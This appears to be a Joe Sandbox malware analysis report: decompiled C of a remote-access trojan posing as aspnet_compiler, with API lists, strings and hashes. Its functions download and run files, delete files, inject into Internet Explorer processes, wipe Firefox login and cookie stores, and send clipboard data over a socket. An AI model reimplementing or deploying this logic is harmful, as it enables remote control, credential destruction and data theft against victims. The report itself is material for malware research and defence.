                    												_t325 = E00401E45( &_v564, _t629, _t674, __eflags, 2);
                    												E00402EF0(0, _t718, E00402EF0(0,  &_v536, E00402EF0(0,  &_v512, E00402F11( &_v560, E00401E45( &_v568, _t629, _t674, __eflags, 1), _t674, 0x472ec8), _t674, __eflags, _t325), _t674, __eflags, 0x472ec8), _t674, __eflags, _t324);
                    												_push(0x56);
                    												E00404A81( &_v416, _t329, __eflags);
                    												E00401FB8();
                    												E00401FB8();
                    												E00401FB8();
                    												E0040415E(0,  &_v544, _t329, _t674, E00401F8B(E00401E45( &_v600, _t329, _t674, __eflags, 0)));
                    												_t338 = E0041A819( &_v572,  &_v548);
                    												_t719 = _t718 - 0x18;
                    												_t640 = "Downloading file: ";
                    												E004052DD(0, _t719, _t640, _t674, __eflags, _t338);
                    												_t720 = _t719 - 0x14;
                    												_t672 = "i";
                    												E00402073(0, _t720, _t640, _t674, "i");
                    												E0041A04A(0, 0x472ec8);
                    												E00401FB8();
                    												E00401EE9();
                    												_t345 = E00401F8B(E00401E45( &_v612, _t640, _t674, __eflags, 0));
                    												_t722 = _t720 + 0x30 - 0x18;
                    												E0040415E(0, _t722, _t640, _t674, _t345);
                    												_t349 = E0043E147(_t347, E00401F8B(E00401E45( &_v620, _t640, _t674, __eflags, 4)), 0, 0xa);
                    												_push(_t640);
                    												_push(_t349);
                    												_t350 = E00406FD7( &_v468, __eflags);
                    												_t724 = _t722 + 0x2c;
                    												_push(0);
                    												__eflags = _t350;
                    												if(__eflags == 0) {
                    													E0040415E(0,  &_v516, _t640, _t674, E00401F8B(E00401E45( &_v624, _t640, _t674, __eflags)));
                    													_t354 = E0041A819( &_v544,  &_v520);
                    													_t629 = "Failed to download file: ";
                    													E004052DD(0, _t724 - 0x18, "Failed to download file: ", _t674, __eflags, _t354);
                    													E00402073(0, _t724 - 4, "Failed to download file: ", _t674, "E");
                    													E0041A04A(0, 0x472ec8);
                    													E00401FB8();
                    													E00401EE9();
                    												} else {
                    													E0040415E(0,  &_v516, _t640, _t674, E00401F8B(E00401E45( &_v624, _t640, _t674, __eflags)));
                    													_t365 = E0041A819( &_v544,  &_v520);
                    													_t629 = "Downloaded file: ";
                    													E004052DD(0, _t724 - 0x18, "Downloaded file: ", _t674, __eflags, _t365);
                    													E00402073(0, _t724 - 4, "Downloaded file: ", _t674, "i");
                    													E0041A04A(0, 0x472ec8);
                    													E00401FB8();
                    													E00401EE9();
                    													E00402073(0, _t724 - 4 + 0x30 - 0x18, "Downloaded file: ", _t674, 0x464074);
                    													_push(0x58);
                    													E00404A81( &_v432, "Downloaded file: ", __eflags);
                    												}
                    												E00404E06(_t629);
                    												E00404EC2(0,  &_v416, _t629, _t672);
                    												L25:
                    												E00401FB8();
                    											} else {
                    												_t673 = _t670 - 1;
                    												_t745 = _t673;
                    												if(_t673 == 0) {
                    													E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, _t745, _t673)));
                    													if((GetFileAttributesW(E00401EE4( &_v548)) & 0x00000010) == 0) {
                    														_t379 = DeleteFileW(E00401EE4( &_v548));
                    													} else {
                    														_t379 = E0041AC0A(E00401EE4( &_v548), _t629);
                    													}
                    													_t747 = _t379;
                    													_t748 = _t379 & 0xffffff00 | _t747 != 0x00000000;
                    													if((_t379 & 0xffffff00 | _t747 != 0x00000000) == 0) {
                    														_t732 = _t680 - 0x18;
                    														E0041A879(0, _t732,  &_v540);
                    														_push(0x55);
                    														E00404A81(0x472fc0,  &_v540, __eflags);
                    														_t383 = E0041A819( &_v544,  &_v568);
                    														_t733 = _t732 - 0x18;
                    														_t645 = "Unable to delete: ";
                    														E004052DD(0, _t733, "Unable to delete: ", _t674, __eflags, _t383);
                    														_t734 = _t733 - 0x14;
                    														_t614 = _t734;
                    														_push("E");
                    													} else {
                    														_t398 = E0041A819( &_v516,  &_v540);
                    														_t736 = _t680 - 0x18;
                    														_t645 = "Deleted file: ";
                    														E004052DD(0, _t736, "Deleted file: ", _t674, _t748, _t398);
                    														_t734 = _t736 - 0x14;
                    														_t614 = _t734;
                    														_push("i");
                    													}
                    													E00402073(0, _t614, _t645, _t674);
                    													E0041A04A(0, 0x472ec8);
                    													_t735 = _t734 + 0x30;
                    													E00401FB8();
                    													_t388 = E00401E45( &_v576, _t645, _t674, _t748, 1);
                    													_t629 = "1";
                    													_t617 = _t388;
                    													if(E00405AE5("1") != 0) {
                    														E004086B8(E0040869C( &_v560, _t617, _t617) + 1);
                    														_push(0x2a);
                    														_t629 =  &_v572;
                    														E00401EF3( &_v572,  &_v572, _t673, E00402F52(0,  &_v548,  &_v572, _t674));
                    														E00401EE9();
                    														E0040415E(0, _t735 - 0x18,  &_v572, _t674, E00401EE4( &_v576));
                    														L57:
                    														E00406EB0();
                    													}
                    													L58:
                    													L59:
                    													E00401EE9();
                    												}
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				E00401E6D( &_v552, _t629);
                    				E00401FB8();
                    				E00401FB8();
                    				return 0;
                    			}

                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 0040732D
                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 004073FB
                    • DeleteFileW.KERNEL32(00000000), ref: 0040741D
                      • Part of subcall function 0041AC0A: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC65
                      • Part of subcall function 0041AC0A: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC95
                      • Part of subcall function 0041AC0A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041ACEA
                      • Part of subcall function 0041AC0A: FindClose.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD4B
                      • Part of subcall function 0041AC0A: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD52
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                      • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00472EE0,?), ref: 00404B27
                      • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00472EE0,?,?,?,?,?,?,0040545D), ref: 00404B55
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0040780B
                    • GetLogicalDriveStringsA.KERNEL32 ref: 004078EC
                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 00407B38
                    • DeleteFileA.KERNEL32(?), ref: 00407CC6
                      • Part of subcall function 00407E80: __EH_prolog.LIBCMT ref: 00407E85
                      • Part of subcall function 00407E80: FindFirstFileW.KERNEL32(00000000,?,004645D0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F3E
                      • Part of subcall function 00407E80: __CxxThrowException@8.LIBVCRUNTIME ref: 00407F66
                      • Part of subcall function 00407E80: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F73
                    • Sleep.KERNEL32(000007D0), ref: 00407D6C
                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 00407DAE
                      • Part of subcall function 0041B35B: SystemParametersInfoW.USER32 ref: 0041B450
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                    • API String ID: 1067849700-1507758755
                    • Opcode ID: 36caf4fe5a422c6f71b5b50b610445828c1ff7a575c619d5082147cc6c9ac470
                    • Instruction ID: bd0fccd32b98e4baecd5a91fc22e0c60ebb53a858293cf8cc6cedc8d782afcc2
                    • Opcode Fuzzy Hash: 36caf4fe5a422c6f71b5b50b610445828c1ff7a575c619d5082147cc6c9ac470
                    • Instruction Fuzzy Hash: 8D42A671A083005BC604FB76C9579AF77A9AF90308F40093FF542771E2EE7D9A49869B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E0040E991(void* __eflags, char _a4) {
                    				char _v0;
                    				void* _v8;
                    				char _v24;
                    				short _v524;
                    				char _v528;
                    				char _v540;
                    				char _v1060;
                    				char _v1088;
                    				void* _v1092;
                    				char _v1108;
                    				void* _v1112;
                    				char _v1120;
                    				void* _v1124;
                    				char _v1132;
                    				char _v1136;
                    				char _v1164;
                    				char _v1172;
                    				char _v1176;
                    				char _v1184;
                    				char _v1188;
                    				char _v1192;
                    				char _v1196;
                    				char _v1197;
                    				char _v1200;
                    				char _v1201;
                    				char _v1208;
                    				void* _v1212;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t72;
                    				void* _t82;
                    				void* _t83;
                    				char _t84;
                    				intOrPtr* _t111;
                    				void* _t117;
                    				void* _t121;
                    				struct _SECURITY_ATTRIBUTES* _t135;
                    				void* _t197;
                    				void* _t205;
                    				void* _t211;
                    				void* _t212;
                    
                    				_t135 = 0;
                    				GetModuleFileNameW(0,  &_v524, 0x104);
                    				_t193 = "1";
                    				if(E00406E3A("1") != 0) {
                    					L14:
                    					E00401EF3( &_a4, _t193, _t207, E0041A1E5( &_v1108, __eflags));
                    					E00401EE9();
                    					_t72 = E00410698( &_v528,  &_v0);
                    					__eflags = _t72;
                    					if(_t72 == 0) {
                    						goto L15;
                    					}
                    				} else {
                    					E00401F66(0,  &_v1196);
                    					_t211 = CreateToolhelp32Snapshot(2, 0);
                    					_v1088 = 0x22c;
                    					_push( &_v1088);
                    					Process32FirstW(_t211);
                    					while(Process32NextW(_t211,  &_v1092) != 0) {
                    						E0040415E(_t135,  &_v1184, _t193, _t211,  &_v1060);
                    						_t111 = E004022E5( &_v1188,  &_v1164);
                    						_t207 = E004022AA( &_v1192,  &_v1164);
                    						E00409291( &_v1164,  *((intOrPtr*)(E004022E5( &_v1196,  &_v1164))),  *_t113,  *_t111);
                    						_t212 = _t212 + 0xc;
                    						_t193 =  &_v24;
                    						_t117 = E0040AF46( &_v24);
                    						__eflags = _t117;
                    						if(_t117 != 0) {
                    							E00401EF3( &_v1208, _v1088, _t207, E0041AB76( &_v1120, _v1088));
                    							E00401EE9();
                    							_t121 = E00406E3A( &_v540);
                    							__eflags = _t121;
                    							if(_t121 == 0) {
                    								_t193 = 0x46a8f0;
                    								__eflags = E00406E3A(0x46a8f0);
                    								if(__eflags != 0) {
                    									L12:
                    									E00401EE9();
                    									L13:
                    									E00401EE9();
                    									goto L14;
                    								} else {
                    									__eflags = E0041AB40(_v1088);
                    									if(__eflags != 0) {
                    										goto L12;
                    									} else {
                    										E0040AEE6( &_v1208);
                    										E00401EE9();
                    										break;
                    									}
                    								}
                    							} else {
                    								E00401EE9();
                    								E00401EE9();
                    							}
                    						} else {
                    							E00401EE9();
                    							continue;
                    						}
                    						goto L22;
                    					}
                    					CloseHandle(_t211);
                    					_t193 = 0x46a8f0;
                    					if(E00406E3A(0x46a8f0) != 0) {
                    						goto L13;
                    					} else {
                    						E00401EE9();
                    						L15:
                    						_t205 = CreateMutexA(_t135, 1, E00401F8B(E00406292( &_v1108, 0x473268, _t211, "-I")));
                    						E00401FB8();
                    						E004020BF(_t135,  &_v1132);
                    						E00401EE4(0x473220);
                    						E0041ADFE( &_v1132);
                    						_t82 = E00401F8B( &_v1132);
                    						_t83 = E00401EE4( &_a4);
                    						_t197 = _t82;
                    						_t84 = E00417456(_t83);
                    						_v1197 = _t84;
                    						if(_t84 != 0) {
                    							L20:
                    							E00412B5F(0x473238, E00401F8B(0x473238), "Inj", 1);
                    							_t135 = _v1197;
                    						} else {
                    							E0040415E(_t135,  &_v1172, _t197, _t211, L"C:\\Program Files(x86)\\Internet Explorer\\");
                    							E00401F8B( &_v1136);
                    							_v1201 = E00417456(E00401EE4(E004087F0( &_v1200,  &_v1176, _t211, L"ieinstal.exe")));
                    							E00401EE9();
                    							if(_v1201 != _t135) {
                    								L19:
                    								E00401EE9();
                    								goto L20;
                    							} else {
                    								E00401F8B( &_v1132);
                    								_v1197 = E00417456(E00401EE4(E004087F0( &_v1196,  &_v1172, _t211, L"ielowutil.exe")));
                    								E00401EE9();
                    								if(_v1197 != _t135) {
                    									goto L19;
                    								} else {
                    									CloseHandle(_t205);
                    									E00401EE9();
                    								}
                    							}
                    						}
                    						E00401FB8();
                    					}
                    				}
                    				L22:
                    				E00401EE9();
                    				return _t135;
                    			}

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00473298,?,00473280), ref: 0040E9AB
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E9D6
                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E9F2
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040EA71
                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00473280), ref: 0040EA80
                      • Part of subcall function 0041AB76: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041AB8B
                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00473280), ref: 0040EBA4
                    • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00473280), ref: 0040EC90
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                    • String ID: 2G$82G$C:\Program Files(x86)\Internet Explorer\$Inj$h2G$ieinstal.exe$ielowutil.exe
                    • API String ID: 193334293-656281143
                    • Opcode ID: 05b2c2b54c2c9e0966ed25669dbd32bf8012f5f199f5605bad934836caaa4f6e
                    • Instruction ID: c6ac6d909184663fdd7a24f9be041a716c06b948c98e485a3872bbbcebe7606d
                    • Opcode Fuzzy Hash: 05b2c2b54c2c9e0966ed25669dbd32bf8012f5f199f5605bad934836caaa4f6e
                    • Instruction Fuzzy Hash: F98141301093419BC754FB62D8919EEB7E4AFA0348F40483FF586631E2EF789949CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E0040B0AA(void* __ebx, void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				struct _WIN32_FIND_DATAA _v468;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t41;
                    				signed int _t55;
                    				signed int _t57;
                    				int _t71;
                    				int _t73;
                    				void* _t132;
                    				void* _t133;
                    				void* _t134;
                    				void* _t135;
                    				void* _t136;
                    
                    				_t141 = __eflags;
                    				_t132 = __edi;
                    				_t86 = __ebx;
                    				E004020BF(__ebx,  &_v100);
                    				E004020BF(__ebx,  &_v76);
                    				E004020BF(__ebx,  &_v28);
                    				_t41 = E00402073(_t86,  &_v124, __edx, _t135, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                    				E00401FC2( &_v28, _t42, _t133, E004052DD(_t86,  &_v52, E0043A9AA(_t86, __eflags, "UserProfile"), _t135, _t141, _t41));
                    				E00401FB8();
                    				E00401FB8();
                    				_t128 =  &_v28;
                    				_t134 = FindFirstFileA(E00401F8B(E00406292( &_v124,  &_v28, _t135, "*")),  &_v468);
                    				E00401FB8();
                    				_t142 = _t134 - 0xffffffff;
                    				if(_t134 != 0xffffffff) {
                    					while(1) {
                    						__eflags = FindNextFileA(_t134,  &_v468);
                    						if(__eflags == 0) {
                    							break;
                    						}
                    						__eflags = _v468.dwFileAttributes & 0x00000010;
                    						if((_v468.dwFileAttributes & 0x00000010) != 0) {
                    							_t55 = E0043E5D0( &(_v468.cFileName), ".");
                    							__eflags = _t55;
                    							if(_t55 != 0) {
                    								_t57 = E0043E5D0( &(_v468.cFileName), "..");
                    								__eflags = _t57;
                    								if(_t57 != 0) {
                    									E00401FC2( &_v100, _t59, _t134, E00408832(_t86,  &_v52, E00406292( &_v148,  &_v28, _t135,  &(_v468.cFileName)), _t132, _t135, __eflags, "\\logins.json"));
                    									E00401FB8();
                    									E00401FB8();
                    									_t128 = E00406292( &_v52,  &_v28, _t135,  &(_v468.cFileName));
                    									E00401FC2( &_v76, _t65, _t134, E00408832(_t86,  &_v148, _t65, _t132, _t135, __eflags, "\\key3.db"));
                    									E00401FB8();
                    									E00401FB8();
                    									_t71 = DeleteFileA(E00401F8B( &_v100));
                    									__eflags = _t71;
                    									if(_t71 == 0) {
                    										GetLastError();
                    									}
                    									_t73 = DeleteFileA(E00401F8B( &_v76));
                    									__eflags = _t73;
                    									if(_t73 == 0) {
                    										GetLastError();
                    									}
                    								}
                    							}
                    						}
                    					}
                    					E00402073(_t86, _t136 - 0x18, _t128, _t135, "\n[Firefox StoredLogins Cleared!]");
                    					E0040B752(_t86, _t128, _t135, __eflags);
                    					FindClose(_t134);
                    					goto L11;
                    				} else {
                    					FindClose(_t134);
                    					E00402073(_t86, _t136 - 0x18,  &_v28, _t135, "\n[Firefox StoredLogins not found]");
                    					E0040B752(_t86,  &_v28, _t135, _t142);
                    					L11:
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					return 1;
                    				}
                    			}

                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B129
                    • FindClose.KERNEL32(00000000), ref: 0040B143
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040B266
                    • FindClose.KERNEL32(00000000), ref: 0040B28C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                    • API String ID: 1164774033-3681987949
                    • Opcode ID: 073a4d63a48226157dde18ccb65b455a12d9a39e5646febe62d80ed98aa8a538
                    • Instruction ID: 4dbca2b9aa89f5e628085f7deb87cc68ab42e838c00934cc31fa014136c7fd8a
                    • Opcode Fuzzy Hash: 073a4d63a48226157dde18ccb65b455a12d9a39e5646febe62d80ed98aa8a538
                    • Instruction Fuzzy Hash: E2512C3191421A5ADB14FBA1EC5AEEEB768AF50304F5001BFF406720E2EF785A458A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00415802(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a24, char _a28, void* _a152, void* _a176) {
                    				void* __ebx;
                    				int _t10;
                    				void* _t20;
                    				void* _t22;
                    				void* _t31;
                    				struct HWND__* _t38;
                    				void* _t57;
                    				void* _t61;
                    				void* _t64;
                    				void* _t66;
                    
                    				_t55 = __edx;
                    				_t10 = OpenClipboard(_t38);
                    				_t68 = _t10;
                    				if(_t10 != 0) {
                    					EmptyClipboard();
                    					E00401E45( &_a16, _t55, __ebp, _t68, _t38);
                    					_t57 = GlobalAlloc(0x2000, E0040245C() + 2);
                    					_t20 = GlobalLock(_t57);
                    					E00401E45( &_a12, _t55, __ebp, _t68, _t38);
                    					_t22 = E0040245C();
                    					E004351E0(_t20, E00401F8B(E00401E45( &_a8, _t55, __ebp, _t68, _t38)), _t22);
                    					_t66 = _t64 + 0xc;
                    					GlobalUnlock(_t57);
                    					SetClipboardData(0xd, _t57);
                    					CloseClipboard();
                    					if(OpenClipboard(_t38) != 0) {
                    						_t61 = GetClipboardData(0xd);
                    						_t31 = GlobalLock(_t61);
                    						GlobalUnlock(_t61);
                    						CloseClipboard();
                    						_t50 =  !=  ? _t31 : 0x46a8f0;
                    						E0040415E(_t38,  &_a28, _t55, __ebp,  !=  ? _t31 : 0x46a8f0);
                    						_t55 =  &_a24;
                    						E0041A879(_t38, _t66 - 0x18,  &_a24);
                    						_push(0x6b);
                    						E00404A81(0x4734e8,  &_a24, _t31);
                    						E00401EE9();
                    					}
                    				}
                    				E00401E6D( &_a16, _t55);
                    				E00401FB8();
                    				E00401FB8();
                    				return 0;
                    			}

                    APIs
                    • OpenClipboard.USER32 ref: 00415803
                    • EmptyClipboard.USER32 ref: 00415811
                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00415831
                    • GlobalLock.KERNEL32 ref: 0041583A
                    • GlobalUnlock.KERNEL32(00000000), ref: 00415870
                    • SetClipboardData.USER32 ref: 00415879
                    • CloseClipboard.USER32 ref: 00415896
                    • OpenClipboard.USER32 ref: 0041589D
                    • GetClipboardData.USER32 ref: 004158AD
                    • GlobalLock.KERNEL32 ref: 004158B6
                    • GlobalUnlock.KERNEL32(00000000), ref: 004158BF
                    • CloseClipboard.USER32 ref: 004158C5
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                    • String ID: 4G
                    • API String ID: 3520204547-3080958808
                    • Opcode ID: b6dff0e6031016ac6f009384d3d94469fe5bf2ae8ae968dd7c5d63977dfa98cf
                    • Instruction ID: f1afe3415f062d0b9b587beb2e8851fc1ee6a0bc4f4e9a56709fcddcee62baf9
                    • Opcode Fuzzy Hash: b6dff0e6031016ac6f009384d3d94469fe5bf2ae8ae968dd7c5d63977dfa98cf
                    • Instruction Fuzzy Hash: EF2158715083005BC714BF71EC5AAAE76A9AF90756F00483EFD06962E3EF38C905C66A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0040B2B1(void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				struct _WIN32_FIND_DATAA _v444;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t30;
                    				signed int _t44;
                    				signed int _t46;
                    				long _t60;
                    				void* _t68;
                    				void* _t69;
                    				void* _t98;
                    				void* _t103;
                    				void* _t104;
                    				void* _t105;
                    				void* _t106;
                    				void* _t107;
                    
                    				_t112 = __eflags;
                    				_t103 = __edi;
                    				E004020BF(_t68,  &_v52);
                    				E004020BF(_t68,  &_v28);
                    				_t30 = E00402073(_t68,  &_v100, __edx, _t106, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                    				E00401FC2( &_v28, _t31, _t104, E004052DD(_t68,  &_v76, E0043A9AA(_t68, __eflags, "UserProfile"), _t106, _t112, _t30));
                    				E00401FB8();
                    				E00401FB8();
                    				_t101 =  &_v28;
                    				_t105 = FindFirstFileA(E00401F8B(E00406292( &_v100,  &_v28, _t106, "*")),  &_v444);
                    				E00401FB8();
                    				_t113 = _t105 - 0xffffffff;
                    				if(_t105 != 0xffffffff) {
                    					while(1) {
                    						__eflags = FindNextFileA(_t105,  &_v444);
                    						if(__eflags == 0) {
                    							break;
                    						}
                    						__eflags = _v444.dwFileAttributes & 0x00000010;
                    						if((_v444.dwFileAttributes & 0x00000010) == 0) {
                    							continue;
                    						} else {
                    							_t44 = E0043E5D0( &(_v444.cFileName), ".");
                    							__eflags = _t44;
                    							if(_t44 == 0) {
                    								continue;
                    							} else {
                    								_t46 = E0043E5D0( &(_v444.cFileName), "..");
                    								__eflags = _t46;
                    								if(_t46 == 0) {
                    									continue;
                    								} else {
                    									_t101 = E00406292( &_v124,  &_v28, _t106,  &(_v444.cFileName));
                    									E00401FC2( &_v52, _t48, _t105, E00408832(_t68,  &_v76, _t48, _t103, _t106, __eflags, "\\cookies.sqlite"));
                    									E00401FB8();
                    									E00401FB8();
                    									__eflags = DeleteFileA(E00401F8B( &_v52));
                    									if(__eflags != 0) {
                    										_t98 = _t107 - 0x18;
                    										_push("\n[Firefox cookies found, cleared!]");
                    										goto L2;
                    									} else {
                    										_t60 = GetLastError();
                    										__eflags = _t60 != 0;
                    										if(_t60 != 0) {
                    											FindClose(_t105);
                    											_t69 = 0;
                    										} else {
                    											continue;
                    										}
                    									}
                    								}
                    							}
                    						}
                    						goto L11;
                    					}
                    					E00402073(_t68, _t107 - 0x18, _t101, _t106, "\n[Firefox Cookies not found]");
                    					E0040B752(_t68, _t101, _t106, __eflags);
                    					FindClose(_t105);
                    					goto L10;
                    				} else {
                    					FindClose(_t105);
                    					_t98 = _t107 - 0x18;
                    					_push("\n[Firefox Cookies not found]");
                    					L2:
                    					E00402073(_t68, _t98, _t101, _t106);
                    					E0040B752(_t68, _t101, _t106, _t113);
                    					L10:
                    					_t69 = 1;
                    				}
                    				L11:
                    				E00401FB8();
                    				E00401FB8();
                    				return _t69;
                    			}

                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B329
                    • FindClose.KERNEL32(00000000), ref: 0040B343
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040B403
                    • FindClose.KERNEL32(00000000), ref: 0040B429
                    • FindClose.KERNEL32(00000000), ref: 0040B44A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$Close$File$FirstNext
                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                    • API String ID: 3527384056-432212279
                    • Opcode ID: 6e259262706716e35cf83066339bf0dd6887841de27ae9bc6657e2767c2a9b71
                    • Instruction ID: 51cc95074229e97af50e91e82164566f02eb9ff2f5b37e3c54f7b0a52fa2c995
                    • Opcode Fuzzy Hash: 6e259262706716e35cf83066339bf0dd6887841de27ae9bc6657e2767c2a9b71
                    • Instruction Fuzzy Hash: 4D416C3194420A6ACB14FBA5DC56DEEB768AE51304F50017FF405B21D2FF389A45CA9E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E00418186(signed int __edx, void* __eflags, char _a8) {
                    				void* _v28;
                    				char _v32;
                    				void* _v36;
                    				void* _v40;
                    				char _v44;
                    				char _v48;
                    				char _v52;
                    				signed char* _t61;
                    				char* _t62;
                    				signed char* _t63;
                    				intOrPtr* _t73;
                    				intOrPtr* _t80;
                    				char* _t87;
                    				char* _t88;
                    				char* _t89;
                    				intOrPtr* _t90;
                    				signed char* _t92;
                    				char* _t93;
                    				intOrPtr _t95;
                    				signed int _t105;
                    				void* _t108;
                    				signed int _t148;
                    
                    				_t95 =  *((intOrPtr*)(E004051C3(0)));
                    				E00404182( &_a8,  &_v32, 1, 0xffffffff);
                    				if(_t95 != 0x30) {
                    					__eflags = _t95 - 0x31;
                    					if(_t95 != 0x31) {
                    						__eflags = _t95 - 0x32;
                    						if(_t95 != 0x32) {
                    							__eflags = _t95 - 0x33;
                    							if(_t95 != 0x33) {
                    								__eflags = _t95 - 0x34;
                    								if(_t95 != 0x34) {
                    									__eflags = _t95 - 0x35;
                    									if(_t95 != 0x35) {
                    										__eflags = _t95 - 0x36;
                    										if(_t95 != 0x36) {
                    											__eflags = _t95 - 0x37;
                    											if(_t95 == 0x37) {
                    												_t61 = E004051C3(2);
                    												_t62 = E004051C3(1);
                    												_t63 = E004051C3(0);
                    												_t105 =  *_t61 & 0x000000ff;
                    												__eflags =  *_t62;
                    												_push(_t105);
                    												_t52 =  *_t62 != 0;
                    												__eflags = _t52;
                    												_push((_t105 & 0xffffff00 | _t52) & 0x000000ff);
                    												_t108 = 0x4736e8;
                    												goto L18;
                    											}
                    										} else {
                    											_push(0);
                    											_push(0x78);
                    											goto L15;
                    										}
                    									} else {
                    										_push(0);
                    										_push(0xffffff88);
                    										L15:
                    										mouse_event(0x800, 0, 0, ??, ??);
                    									}
                    								} else {
                    									_v40 =  *((intOrPtr*)(E004051C3(0)));
                    									_v40 =  *((intOrPtr*)(E004051C3(4)));
                    									E00418009( *((intOrPtr*)(E004051C3(8))),  &_v48,  &_v44);
                    									E004184AD(_v48, _v44);
                    								}
                    							} else {
                    								_t73 = E004051C3(0);
                    								_v44 =  *((intOrPtr*)(E004051C3(4)));
                    								_v44 =  *((intOrPtr*)(E004051C3(8)));
                    								E00418009( *((intOrPtr*)(E004051C3(0xc))),  &_v52,  &_v48);
                    								E0041844A( *_t73, _v52, _v48);
                    								goto L8;
                    							}
                    						} else {
                    							_t80 = E004051C3(0);
                    							_v40 =  *((intOrPtr*)(E004051C3(4)));
